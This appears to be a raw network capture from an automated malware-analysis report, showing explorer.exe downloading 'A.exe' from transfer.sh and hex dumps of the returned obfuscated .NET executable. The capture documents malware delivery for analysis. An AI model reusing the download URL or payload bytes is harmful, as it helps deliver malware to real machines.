                                                                                                                                                        2021-12-28 02:23:24 UTC476INData Raw: 57 00 52 00 30 00 74 00 56 00 36 00 36 00 69 00 48 00 73 00 57 00 71 00 31 00 58 00 32 00 2f 00 6a 00 55 00 74 00 78 00 42 00 7a 00 63 00 58 00 57 00 50 00 55 00 46 00 31 00 47 00 6b 00 59 00 36 00 41 00 4c 00 4c 00 49 00 62 00 39 00 43 00 34 00 41 00 6a 00 78 00 6b 00 2f 00 44 00 38 00 33 00 64 00 76 00 43 00 54 00 67 00 67 00 63 00 55 00 33 00 4f 00 51 00 52 00 57 00 56 00 75 00 31 00 49 00 6b 00 33 00 2f 00 78 00 56 00 2b 00 33 00 33 00 45 00 75 00 33 00 71 00 6d 00 66 00 42 00 6a 00 58 00 4e 00 49 00 44 00 59 00 43 00 32 00 41 00 4a 00 56 00 41 00 6d 00 63 00 33 00 78 00 71 00 4f 00 67 00 32 00 49 00 76 00 6b 00 53 00 54 00 41 00 4b 00 41 00 78 00 33 00 4b 00 37 00 4f 00 44 00 37 00 44 00 6b 00 79 00 39 00 72 00 6c 00 76 00 41 00 59 00 62 00 63 00 30
                                                                                                                                                        Data Ascii: WR0tV66iHsWq1X2/jUtxBzcXWPUF1GkY6ALLIb9C4Ajxk/D83dvCTggcU3OQRWVu1Ik3/xV+33Eu3qmfBjXNIDYC2AJVAmc3xqOg2IvkSTAKAx3K7OD7Dky9rlvAYbc0
                                                                                                                                                        2021-12-28 02:23:24 UTC492INData Raw: 68 00 38 00 52 00 58 00 32 00 76 00 39 00 45 00 44 00 33 00 72 00 52 00 5a 00 55 00 6f 00 46 00 53 00 42 00 31 00 54 00 46 00 55 00 2f 00 4e 00 6b 00 6f 00 51 00 37 00 6e 00 57 00 30 00 47 00 39 00 51 00 51 00 46 00 51 00 63 00 32 00 39 00 59 00 75 00 38 00 4c 00 43 00 50 00 6f 00 44 00 70 00 4e 00 54 00 54 00 51 00 74 00 4d 00 4a 00 70 00 71 00 2b 00 65 00 75 00 4c 00 50 00 39 00 75 00 6a 00 55 00 56 00 67 00 36 00 72 00 54 00 68 00 36 00 56 00 59 00 43 00 66 00 5a 00 38 00 36 00 64 00 6c 00 50 00 61 00 65 00 43 00 71 00 58 00 6c 00 58 00 33 00 65 00 78 00 6b 00 44 00 52 00 73 00 64 00 6a 00 63 00 37 00 4a 00 45 00 6f 00 56 00 46 00 69 00 65 00 6a 00 71 00 78 00 31 00 33 00 32 00 73 00 64 00 58 00 7a 00 33 00 6d 00 56 00 45 00 34 00 65 00 46 00 55 00 4e
                                                                                                                                                        Data Ascii: h8RX2v9ED3rRZUoFSB1TFU/NkoQ7nW0G9QQFQc29Yu8LCPoDpNTTQtMJpq+euLP9ujUVg6rTh6VYCfZ86dlPaeCqXlX3exkDRsdjc7JEoVFiejqx132sdXz3mVE4eFUN
                                                                                                                                                        2021-12-28 02:23:24 UTC508INData Raw: 30 00 6b 00 43 00 63 00 58 00 76 00 67 00 6a 00 6f 00 48 00 6b 00 6a 00 68 00 4b 00 79 00 32 00 73 00 70 00 65 00 33 00 32 00 46 00 4e 00 2f 00 50 00 56 00 4e 00 4b 00 6b 00 4b 00 6c 00 34 00 61 00 4c 00 36 00 53 00 56 00 56 00 58 00 49 00 4a 00 62 00 32 00 2f 00 55 00 74 00 6b 00 4b 00 57 00 75 00 43 00 4f 00 59 00 42 00 59 00 30 00 79 00 68 00 65 00 55 00 68 00 6e 00 6b 00 69 00 4a 00 64 00 6b 00 55 00 6e 00 62 00 6f 00 54 00 70 00 33 00 68 00 4d 00 67 00 6b 00 45 00 56 00 7a 00 48 00 4f 00 42 00 6c 00 65 00 70 00 46 00 63 00 61 00 39 00 6f 00 4f 00 72 00 42 00 4a 00 66 00 6b 00 78 00 52 00 31 00 4c 00 71 00 38 00 49 00 53 00 68 00 6e 00 52 00 54 00 4d 00 47 00 43 00 58 00 51 00 64 00 4e 00 52 00 58 00 4e 00 30 00 34 00 48 00 50 00 4a 00 73 00 73 00 71
                                                                                                                                                        Data Ascii: 0kCcXvgjoHkjhKy2spe32FN/PVNKkKl4aL6SVVXIJb2/UtkKWuCOYBY0yheUhnkiJdkUnboTp3hMgkEVzHOBlepFca9oOrBJfkxR1Lq8IShnRTMGCXQdNRXN04HPJssq
                                                                                                                                                        2021-12-28 02:23:24 UTC524INData Raw: 4f 00 41 00 67 00 48 00 51 00 30 00 69 00 66 00 4e 00 42 00 4e 00 42 00 44 00 65 00 77 00 4a 00 74 00 76 00 56 00 2b 00 4e 00 30 00 43 00 49 00 6f 00 33 00 48 00 36 00 37 00 57 00 76 00 71 00 4d 00 48 b8 00 00 00 00 00 00 00 00 49 39 40 08 74 0c 48 b8 00 00 00 00 00 00 00 00 ff e0 48 b8 00 00 00 00 00 00 00 00 ff e0 7b 05 4a 0c f4 9c dd 9a 79 dd b7 29 79 41 09 2b 43 51 17 2b 4a 3f 40 17 5f b9 e2 f4 2d c2 d3 2b 78 a4 6a d7 56 b7 c7 e8 db 70 20 24 ee ce bd c1 af 0f 7c f5 2a c6 87 47 13 46 30 a8 01 95 46 fd d8 98 80 69 af f7 44 8b b1 5b ff ff be d7 5c 89 22 11 90 6b 93 71 98 fd 8e 43 79 a6 21 08 b4 49 62 25 1e f6 40 b3 40 c0 51 5a 5e 26 aa c7 b6 e9 5d 10 2f d6 53 14 44 02 81 e6 a1 d8 c8 fb d3 e7 e6 cd e1 21 d6 07 37 c3 87 0d d5 f4 ed 14 5a 45 05 e9 e3 a9 f8
                                                                                                                                                        Data Ascii: OAgHQ0ifNBNBDewJtvV+N0CIo3H67WvqMHI9@tHH{Jy)yA+CQ+J?@_-+xjVp $|*GF0FiD[\"kqCy!Ib%@@QZ^&]/SD!7ZE


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        1192.168.2.349850144.76.136.153443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        2021-12-28 02:23:56 UTC526OUTGET /get/s3SPeb/A.exe HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Host: transfer.sh
                                                                                                                                                        2021-12-28 02:23:57 UTC526INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.14.2
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:56 GMT
                                                                                                                                                        Content-Type: application/x-ms-dos-executable
                                                                                                                                                        Content-Length: 538112
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Disposition: attachment; filename="A.exe"
                                                                                                                                                        Retry-After: Tue, 28 Dec 2021 03:23:56 GMT
                                                                                                                                                        X-Made-With: <3 by DutchCoders
                                                                                                                                                        X-Ratelimit-Key: 127.0.0.1,102.129.143.96,102.129.143.96
                                                                                                                                                        X-Ratelimit-Limit: 10
                                                                                                                                                        X-Ratelimit-Rate: 600
                                                                                                                                                        X-Ratelimit-Remaining: 9
                                                                                                                                                        X-Ratelimit-Reset: 1640658236
                                                                                                                                                        X-Remaining-Days: n/a
                                                                                                                                                        X-Remaining-Downloads: n/a
                                                                                                                                                        X-Served-By: Proudly served by DutchCoders
                                                                                                                                                        2021-12-28 02:23:57 UTC527INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5d 02 25 8f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 2e 08 00 00 06 00 00 00 00 00 00 1e 4d 08 00 00 20 00 00 00 60 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL]%0.M `@ @
                                                                                                                                                        2021-12-28 02:23:57 UTC542INData Raw: 11 38 28 f1 00 00 06 11 47 59 13 17 20 95 00 00 00 38 a3 dd ff ff 11 60 11 6a 11 16 16 91 9c 20 97 01 00 00 28 1d 01 00 06 3a 8b dd ff ff 26 20 0c 02 00 00 38 80 dd ff ff 14 13 16 20 61 02 00 00 38 73 dd ff ff fe 0c 6c 00 20 09 00 00 00 20 9f 00 00 00 20 35 00 00 00 59 9c 20 bf 01 00 00 38 54 dd ff ff 11 0a 28 09 01 00 06 13 3c 20 65 00 00 00 28 1d 01 00 06 3a 3c dd ff ff 26 20 4a 02 00 00 38 31 dd ff ff 20 87 00 00 00 20 61 00 00 00 58 fe 0e 3b 00 20 c6 00 00 00 28 1c 01 00 06 3a 13 dd ff ff 26 20 be 00 00 00 38 08 dd ff ff 11 38 28 f1 00 00 06 13 1d 20 d2 00 00 00 28 1d 01 00 06 3a f0 dc ff ff 26 20 ea 01 00 00 38 e5 dc ff ff 16 13 34 20 86 00 00 00 28 1c 01 00 06 39 d3 dc ff ff 26 20 2e 01 00 00 38 c8 dc ff ff fe 0c 6c 00 20 03 00 00 00 20 dd 00 00 00
                                                                                                                                                        Data Ascii: 8(GY 8`j (:& 8 a8sl 5Y 8T(< e(:<& J81 aX; (:& 88( (:& 84 (9& .8l
                                                                                                                                                        2021-12-28 02:23:57 UTC558INData Raw: 3f 00 00 00 38 00 00 00 00 d0 2e 00 00 02 28 01 01 00 06 11 48 28 0e 01 00 06 28 0f 01 00 06 74 2e 00 00 02 80 66 00 00 04 20 01 00 00 00 28 1c 01 00 06 3a bf ff ff ff 26 20 01 00 00 00 38 b4 ff ff ff dd 4c 00 00 00 26 20 00 00 00 00 28 1c 01 00 06 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 23 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 dd 1a 00 00 00 20 01 00 00 00 28 1d 01 00 06 3a 25 ff ff ff 26 20 01 00 00 00 38 1a ff ff ff dd 2a ae ff ff 20 33 00 00 00 38 16 9d ff ff 11 5a 28 e9 00 00 06 20 3f 02 00 00 38 05 9d ff ff 38 c9 b8 ff ff 20 22 02 00 00 38 f6 9c ff ff 11 72 11 56 1a 5a 1a 12 1b 28 ae 00 00 06 39 90 b4 ff ff 20 71 00 00 00 28 1d 01 00 06 3a d4 9c ff ff 26 20 3a 01 00 00 38 c9 9c ff ff fe 0c 18 00 20 00 00 00 00 fe 0c 3b 00 9c 20
                                                                                                                                                        Data Ascii: ?8.(H((t.f (:& 8L& (:& 8#E8 (:%& 8* 38Z( ?88 "8rVZ(9 q(:& :8 ;
                                                                                                                                                        2021-12-28 02:23:57 UTC574INData Raw: 00 00 38 9a d1 ff ff fe 0c 0b 00 20 02 00 00 00 fe 0c 19 00 9c 20 21 00 00 00 fe 0e 1d 00 38 7a d1 ff ff fe 0c 03 00 20 08 00 00 00 20 67 00 00 00 20 4a 00 00 00 58 9c 20 1d 00 00 00 28 73 01 00 06 39 5a d1 ff ff 26 20 45 00 00 00 38 4f d1 ff ff fe 0c 0b 00 20 02 00 00 00 fe 0c 19 00 9c 20 0c 00 00 00 38 37 d1 ff ff fe 0c 0b 00 20 13 00 00 00 fe 0c 0d 00 9c 20 3e 00 00 00 fe 0e 1d 00 38 17 d1 ff ff 11 24 17 3b aa f7 ff ff 20 89 00 00 00 38 09 d1 ff ff fe 0c 03 00 20 00 00 00 00 20 bf 00 00 00 20 2e 00 00 00 58 9c 20 10 00 00 00 38 ea d0 ff ff 20 0c 00 00 00 20 65 00 00 00 58 fe 0e 19 00 20 fe 00 00 00 38 d1 d0 ff ff 11 15 13 02 20 5f 00 00 00 38 c3 d0 ff ff fe 0c 03 00 20 0b 00 00 00 fe 0c 16 00 9c 20 16 00 00 00 38 ab d0 ff ff fe 0c 0b 00 20 1a 00 00 00
                                                                                                                                                        Data Ascii: 8 !8z g JX (s9Z& E8O 87 >8$; 8 .X 8 eX 8 _8 8
                                                                                                                                                        2021-12-28 02:23:57 UTC590INData Raw: 6c 47 1e 0e 00 4e 71 47 1e 16 00 ad 71 b9 71 06 00 e1 71 9c 2c 06 00 19 73 23 27 06 00 6d 73 87 73 06 00 97 73 5f 00 0a 00 ab 73 2b 00 06 00 bc 73 d9 73 06 00 fd 73 d9 73 06 00 09 74 d9 73 06 00 0d 74 2b 00 06 00 28 74 23 27 06 00 3d 74 36 18 06 00 5f 74 36 18 06 00 71 74 36 18 06 00 79 74 5f 00 00 00 00 00 10 01 00 00 00 00 01 00 01 00 81 01 00 00 19 01 00 00 29 00 01 00 02 00 81 01 00 00 5f 01 00 00 29 00 02 00 06 00 03 01 00 00 82 01 00 00 29 00 03 00 0c 00 81 01 00 00 97 01 00 00 29 00 05 00 11 00 01 00 00 00 ce 01 00 00 29 00 08 00 15 00 83 01 00 00 0c 02 00 00 29 00 0a 00 1d 00 81 01 00 00 13 02 00 00 29 00 0b 00 1e 00 01 00 00 00 3b 02 00 00 29 00 0d 00 27 00 83 01 00 00 0c 02 00 00 29 00 0f 00 2f 00 83 01 00 00 7d 02 00 00 29 00 11 00 30 00 80 01
                                                                                                                                                        Data Ascii: lGNqGqqq,s#'msss_s+sssstst+(t#'=t6_t6qt6yt_)_))))));)')/})0
                                                                                                                                                        2021-12-28 02:23:57 UTC606INData Raw: 02 00 00 00 00 00 00 c6 05 6a 42 56 0f 4a 02 00 00 00 00 00 00 c6 05 75 42 56 0f 4a 02 00 00 00 00 00 00 c6 05 80 42 5c 0f 4a 02 00 00 00 00 00 00 c6 05 8b 42 5c 0f 4a 02 00 00 00 00 00 00 c6 05 96 42 56 0f 4a 02 00 00 00 00 00 00 c6 05 a1 42 56 0f 4a 02 00 00 00 00 00 00 c6 05 ac 42 56 0f 4a 02 00 00 00 00 00 00 c6 05 b7 42 5c 0f 4a 02 00 00 00 00 00 00 c6 05 c2 42 56 0f 4a 02 00 00 00 00 00 00 c6 05 cd 42 56 0f 4a 02 00 00 00 00 00 00 c6 05 d8 42 56 0f 4a 02 00 00 00 00 00 00 c6 05 e3 42 5c 0f 4a 02 00 00 00 00 00 00 c6 05 ee 42 56 0f 4a 02 00 00 00 00 00 00 c6 05 f9 42 56 0f 4a 02 00 00 00 00 00 00 c6 05 04 43 56 0f 4a 02 00 00 00 00 00 00 c6 05 0f 43 56 0f 4a 02 00 00 00 00 00 00 c6 05 1a 43 56 0f 4a 02 00 00 00 00 00 00 c6 05 25 43 56 0f 4a 02 00 00
                                                                                                                                                        Data Ascii: jBVJuBVJB\JB\JBVJBVJBVJB\JBVJBVJBVJB\JBVJBVJCVJCVJCVJ%CVJ
                                                                                                                                                        2021-12-28 02:23:57 UTC622INData Raw: 2a 00 00 02 00 87 2a 00 00 01 00 87 2a 00 00 01 00 87 2a 00 00 01 00 87 2a 00 00 01 00 87 2a 00 00 01 00 87 2a 00 00 01 00 87 2a 00 00 01 00 87 2a 00 00 02 00 87 2a 00 00 01 00 87 2a 00 00 01 00 87 2a 00 00 01 00 87 2a 00 00 01 00 87 2a 00 00 01 00 87 2a 00 00 01 00 87 2a 00 00 01 00 87 2a 00 00 02 00 87 2a 00 00 01 00 87 2a 00 00 02 00 87 2a 00 00 01 00 87 2a 00 00 02 00 87 2a 00 00 01 00 87 2a 00 00 01 00 87 2a 00 00 01 00 87 2a 00 00 01 00 87 2a 00 00 02 00 87 2a 00 00 01 00 95 50 00 00 02 00 9c 50 00 00 01 00 95 50 00 00 02 00 9c 50 00 00 03 00 90 21 00 00 04 00 4a 21 00 00 01 00 a3 21 00 00 01 00 87 2a 00 00 02 00 87 2a 00 00 01 00 95 50 00 00 01 00 95 50 00 00 02 00 90 21 00 00 03 00 4a 21 00 00 01 00 a3 21 00 00 01 00 87 2a 00 00 02 00 87 2a 00 00
                                                                                                                                                        Data Ascii: ***************************PPPP!J!!**PP!J!!**
                                                                                                                                                        2021-12-28 02:23:57 UTC638INData Raw: 52 65 61 64 65 72 00 67 65 74 5f 42 61 73 65 53 74 72 65 61 6d 00 73 65 74 5f 50 6f 73 69 74 69 6f 6e 00 52 65 61 64 55 49 6e 74 33 32 00 75 75 35 6c 30 50 71 44 58 00 50 61 72 61 6d 65 74 65 72 49 6e 66 6f 00 44 79 6e 61 6d 69 63 4d 65 74 68 6f 64 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 45 6d 69 74 00 49 4c 47 65 6e 65 72 61 74 6f 72 00 4d 6f 6e 69 74 6f 72 00 53 79 73 74 65 6d 2e 54 68 72 65 61 64 69 6e 67 00 45 6e 74 65 72 00 47 65 74 4d 61 6e 69 66 65 73 74 52 65 73 6f 75 72 63 65 53 74 72 65 61 6d 00 67 65 74 5f 4c 65 6e 67 74 68 00 52 65 61 64 42 79 74 65 73 00 43 6c 6f 73 65 00 41 64 64 00 45 78 69 74 00 47 65 74 46 69 65 6c 64 73 00 42 69 6e 64 69 6e 67 46 6c 61 67 73 00 4d 65 6d 62 65 72 49 6e 66 6f 00 67 65 74 5f 4d 65 74 61 64
                                                                                                                                                        Data Ascii: Readerget_BaseStreamset_PositionReadUInt32uu5l0PqDXParameterInfoDynamicMethodSystem.Reflection.EmitILGeneratorMonitorSystem.ThreadingEnterGetManifestResourceStreamget_LengthReadBytesCloseAddExitGetFieldsBindingFlagsMemberInfoget_Metad
                                                                                                                                                        2021-12-28 02:23:57 UTC654INData Raw: 70 6b 77 00 69 77 4b 75 47 49 6e 6a 65 00 51 4f 45 4a 75 55 75 66 4a 00 48 54 4e 35 4e 42 63 46 6c 00 59 34 38 30 62 6f 66 49 77 00 51 72 53 31 53 55 6e 59 51 50 00 6e 64 31 58 57 55 68 38 73 00 76 58 32 56 48 62 48 4b 62 00 43 53 68 61 72 70 41 72 67 75 6d 65 6e 74 49 6e 66 6f 46 6c 61 67 73 00 6d 51 78 39 6c 4d 38 4b 58 00 4a 51 54 43 6e 5a 68 4c 6e 00 44 35 41 62 6a 45 70 68 55 56 00 4c 6d 50 62 77 6e 31 4f 71 56 00 62 6c 74 62 49 62 42 65 42 59 00 4a 77 66 62 64 31 68 6d 43 30 00 57 50 71 62 51 67 50 6f 34 33 00 43 58 46 77 53 36 5a 50 58 51 00 78 30 48 62 67 57 58 6a 53 72 00 52 54 4f 62 70 4b 52 33 6a 47 00 58 63 76 62 37 35 64 49 47 59 00 45 46 79 62 36 61 79 4a 76 43 00 6c 45 58 62 59 6d 78 56 37 5a 00 65 65 6e 62 6c 34 38 33 43 36 00 4c 32 34 62
                                                                                                                                                        Data Ascii: pkwiwKuGInjeQOEJuUufJHTN5NBcFlY480bofIwQrS1SUnYQPnd1XWUh8svX2VHbHKbCSharpArgumentInfoFlagsmQx9lM8KXJQTCnZhLnD5AbjEphUVLmPbwn1OqVbltbIbBeBYJwfbd1hmC0WPqbQgPo43CXFwS6ZPXQx0HbgWXjSrRTObpKR3jGXcvb75dIGYEFyb6ayJvClEXbYmxV7Zeenbl483C6L24b
                                                                                                                                                        2021-12-28 02:23:57 UTC670INData Raw: f5 f3 66 43 c2 f8 00 e9 61 b3 a3 70 85 40 4c 68 71 bd e7 c6 9b 57 83 02 71 e1 65 d6 86 d1 2b b8 62 be ad 23 fe ce 14 0b 86 7d 62 28 b7 bd dc d9 25 21 31 85 7e 3b 1e c4 78 3a bf ac 07 bf 2a cf 06 7e da f6 61 04 7d f4 c6 5b 3f 6a 96 e7 4b 93 1b 04 97 55 ca 7c 75 79 c4 a4 4d f4 0b 70 c1 ed 37 09 36 c1 9f 19 4a c9 9b ec 41 0d 5d 8e 4d a5 0a ac 2e 16 a0 06 68 a0 3c bc 98 40 79 da 37 f1 f1 3a a4 86 81 92 0e 97 fd ca 6a 29 d8 78 f6 13 7f 82 c5 06 fe 48 70 cc 4e 95 4d c9 60 23 75 73 43 5d 5b ac 34 9b d4 ee 31 37 24 66 51 55 1b 0f 12 a3 e6 36 8d 84 18 a8 1b 45 a1 77 18 7d f4 55 df eb 80 b4 fa e9 16 9c a2 fe 47 4c 2a b3 f4 00 0b 56 6a 0a d7 04 5f ff a6 9b e5 c8 ec f1 b1 b7 55 f3 b9 24 e6 e4 6e 8b 93 92 6d 38 97 c5 b4 ff 2c 3e e3 0c d2 f6 ec f5 d4 a5 62 95 b2 e6 ac
                                                                                                                                                        Data Ascii: fCap@LhqWqe+b#}b(%!1~;x:*~a}[?jKU|uyMp76JA]M.h<@y7:j)xHpNM`#usC][417$fQU6Ew}UGL*Vj_U$nm8,>b
                                                                                                                                                        2021-12-28 02:23:57 UTC686INData Raw: 4f 9d 20 a6 5c e9 c7 9c 9e e3 f6 1d 0d 00 ff 31 5f 9c d8 76 74 bb d9 52 5f 32 fb 0f 51 93 2a 8d 30 bd 2d 7f f3 a5 57 a5 0f f1 4e c9 e9 da 01 de 28 42 f3 df 84 58 c9 28 4d f8 47 4a cf 72 16 6e a2 de 18 2c bc 71 d7 b3 65 1d f7 3b 2f ec 15 2a 1e 57 d9 96 63 b6 a2 8e e4 e2 ab e3 a3 e6 ca 06 d2 1c 69 04 5a 52 36 39 19 b6 ae aa 76 43 58 e4 64 d9 de 63 30 cb 4c 60 49 ba 14 96 59 ee 50 50 0e 6d 8b 01 02 8e 63 cb 7b 03 90 95 cc 2e 87 3b 7f 65 fe 0d 65 c6 36 26 9b f1 b8 0c d7 db 02 d0 9f 30 36 d2 00 63 c4 30 fc 8e 55 ed 8e bd 81 02 04 46 ed 15 05 c6 d9 97 18 a7 f9 70 51 2f d2 8e a4 8c 0a 0d 39 4b 2a 12 23 e3 b0 87 72 d5 a3 f6 2d bd 71 37 09 6c 11 74 bc e2 cc 08 ad 91 9f 13 85 ce e6 5a f1 00 86 01 72 23 f8 b1 02 9d a4 40 e8 e4 3e 3a 58 cb 54 78 12 73 14 f8 e8 ef bd
                                                                                                                                                        Data Ascii: O \1_vtR_2Q*0-WN(BX(MGJrn,qe;/*WciZR69vCXdc0L`IYPPmc{.;ee6&06c0UFpQ/9K*#r-q7ltZr#@>:XTxs
                                                                                                                                                        2021-12-28 02:23:57 UTC702INData Raw: 34 5a 78 22 f0 3b 13 34 2e 86 6b 91 8a b5 9d b5 89 28 02 4a 80 80 b0 2a dc 09 ef 05 1a 35 8d 96 36 71 95 bc bc 13 ab 52 1b 54 c5 83 a1 12 cb a2 61 d8 e2 6a 98 53 8e e7 05 08 58 6c bf 93 9e 20 65 58 27 8a 8f 1f 48 0b ec b7 f9 6a 3b a0 0f 40 14 97 aa 31 e4 82 9d be f5 57 69 c1 38 49 f9 3e a9 d1 6b 64 30 a7 16 3f 38 90 fd 76 25 56 88 7e d9 fc 8c 2e c6 f1 4b 82 19 a4 e8 aa 94 a7 36 e6 39 b6 91 f8 2f 94 fa b4 91 e4 0e 7f c0 65 7c 1a 43 69 31 cb 5f 11 51 88 f0 a0 3d 8b e3 2f 6d 70 a4 ac bf c5 b0 a6 db 9b 95 d7 29 d2 a3 e8 3b 0f 33 0c ef c4 94 a3 cc d3 34 fd da 4b 02 cd 98 0b d3 10 70 df f5 1a a2 6c ef da 78 9a 99 27 ee 88 b9 64 96 b9 52 b2 28 a2 a4 f6 35 c4 3b f5 01 3d 86 e6 c6 96 fe c9 5e 65 6e 5a 77 37 f4 59 1b 2a a5 70 4a 15 cd 43 36 ea 18 49 6d 80 35 5d 08
                                                                                                                                                        Data Ascii: 4Zx";4.k(J*56qRTajSXl eX'Hj;@1Wi8I>kd0?8v%V~.K69/e|Ci1_Q=/mp);34Kplx'dR(5;=^enZw7Y*pJC6Im5]
                                                                                                                                                        2021-12-28 02:23:57 UTC718INData Raw: 0f 09 c9 aa 54 f7 b6 6c 7f bb 33 e1 fe e0 90 c5 13 07 37 e9 65 d4 60 f6 f7 37 b7 9e a5 2f 70 49 1b ce db 50 fd 88 30 b7 fd 0f 89 4c 8d 1a 18 c4 0a 2a 5e d3 de 5a ad 39 a3 2c 50 39 4f d9 80 6c 1b 91 4c 7f 3d fc 7d 08 bb fe ed 5f b0 56 c7 95 be 27 6e 6f 5c 8d 59 a5 4c 44 70 e8 ed 0a 12 81 a6 e8 1e ef 43 69 51 f0 e7 79 15 33 9b 5b d9 cd 72 ec 21 02 95 50 69 6d c6 0b b8 ff 90 59 04 12 82 37 e0 ea c8 3d 83 f0 17 07 e2 c9 db 62 cd 22 dd 80 65 f8 a9 19 61 b0 33 22 9b 1e e4 e2 c6 93 26 2e 46 f1 10 2b ab 8c b9 34 6a c6 85 23 c8 47 f0 41 43 f4 d4 02 3f b9 41 19 bd 59 ae b6 d7 87 4f 0c 2a 27 6a d7 4d 8a 2d 3c 36 a9 cd 0a a2 46 c0 21 3c 44 4e 28 3c 1d 36 eb 55 ca 7c fe fc 01 5f 30 a9 2e 88 7b b8 82 51 71 3b d4 d6 f8 67 2c be f7 f0 7d 89 6a 21 6b d8 13 3d e3 c0 d3 8b
                                                                                                                                                        Data Ascii: Tl37e`7/pIP0L*^Z9,P9OlL=}_V'no\YLDpCiQy3[r!PimY7=b"ea3"&.F+4j#GAC?AYO*'jM-<6F!<DN(<6U|_0.{Qq;g,}j!k=
                                                                                                                                                        2021-12-28 02:23:57 UTC734INData Raw: 25 4f 8b 22 45 6b 66 cf 44 ad d1 0e 39 41 2c f5 52 ff 75 a8 56 ef d6 6b ad 63 7a 8a ba 79 2f e0 e4 0f 74 f5 4d 92 b0 d2 c3 89 11 b1 87 bf 7d f0 47 5b 3f 57 32 f1 8d 18 cd c8 ea ea f7 d5 88 09 cb 63 89 3d 77 cf 7e 1e cf 50 67 b0 a1 b7 66 a8 9a 9f f9 85 03 1f 01 c5 1a 55 e5 f6 d6 fe b7 6d d6 b8 2f 89 a7 24 9d c1 37 90 e8 78 de ea 7f 17 71 df 41 c5 58 af f6 78 8e 2b b6 ce d0 d3 cd 55 75 41 3f f8 1f 26 70 67 eb 91 c6 a4 15 67 98 e4 f4 d1 99 7d e2 f0 b3 ea 93 6d 16 ce 9d 26 e5 7d a1 4f d0 33 d5 50 30 e8 ac f5 77 f0 d5 a3 ba 7a e1 9a b2 b0 6a 7d cd f1 d2 9f c2 dc b4 1d 50 ef 27 35 06 6a 35 e7 b4 13 e2 99 9f 20 88 18 9e 29 a4 6c 3b 55 cd d1 2c ea 0d a9 b6 7c 70 db 1b e2 0e 17 d3 28 e1 96 95 d4 c2 fb b8 49 c6 ee 38 7c 75 e6 65 c3 10 5f de 79 63 cd 34 5b b1 e0 d3
                                                                                                                                                        Data Ascii: %O"EkfD9A,RuVkczy/tM}G[?W2c=w~PgfUm/$7xqAXx+UuA?&pgg}m&}O3P0wzj}P'5j5 )l;U,|p(I8|ue_yc4[
                                                                                                                                                        2021-12-28 02:23:57 UTC750INData Raw: a4 f7 50 ec 91 3c 71 c4 25 a1 3a 98 39 c3 91 1b 21 6a 7e d5 2c a4 2c 59 d7 f7 f0 a0 eb b7 98 54 d6 eb 3a d3 20 68 2d 42 ba 4e ee 4a 5c 96 3e 8e ac f6 4c c0 42 0c 44 4f 84 3b 33 1f cc bc aa a3 d7 dc 54 04 7d e3 39 9a 95 bd d1 29 26 a6 14 b6 4e 7c 4b be 37 43 59 f4 ca 6c 5e 45 cf b6 3c b5 ee ee 52 3d 20 88 66 85 59 e4 04 8b e2 1e 1f 90 06 ef 77 4a 0d 51 30 e9 e2 c6 6f 80 d5 6e a6 a7 4f 11 4a 87 5c 1e 56 df b3 cd 42 cd b5 97 59 68 53 8f b3 96 38 bb ba 46 ec 92 8a 98 24 60 83 9e eb 8c 56 47 5c 50 20 5b 27 06 d0 ab c1 4b df a1 b4 9f d6 56 20 26 c9 b3 c5 19 75 a0 af cc ca df c8 4c 72 21 33 32 fd 14 b3 2d e9 17 4c 34 6a e9 86 54 95 2e 8b 7f 05 5f f0 b0 e8 53 2d ab 08 05 27 d7 52 d2 84 bd 75 f0 1a f8 34 3f 2e c1 78 8c cc b4 70 f0 17 e6 be 76 10 28 94 f6 b6 11 a4
                                                                                                                                                        Data Ascii: P<q%:9!j~,,YT: h-BNJ\>LBDO;3T}9)&N|K7CYl^E<R= fYwJQ0onOJ\VBYhS8F$`VG\P ['KV &uLr!32-L4jT._S-'Ru4?.xpv(
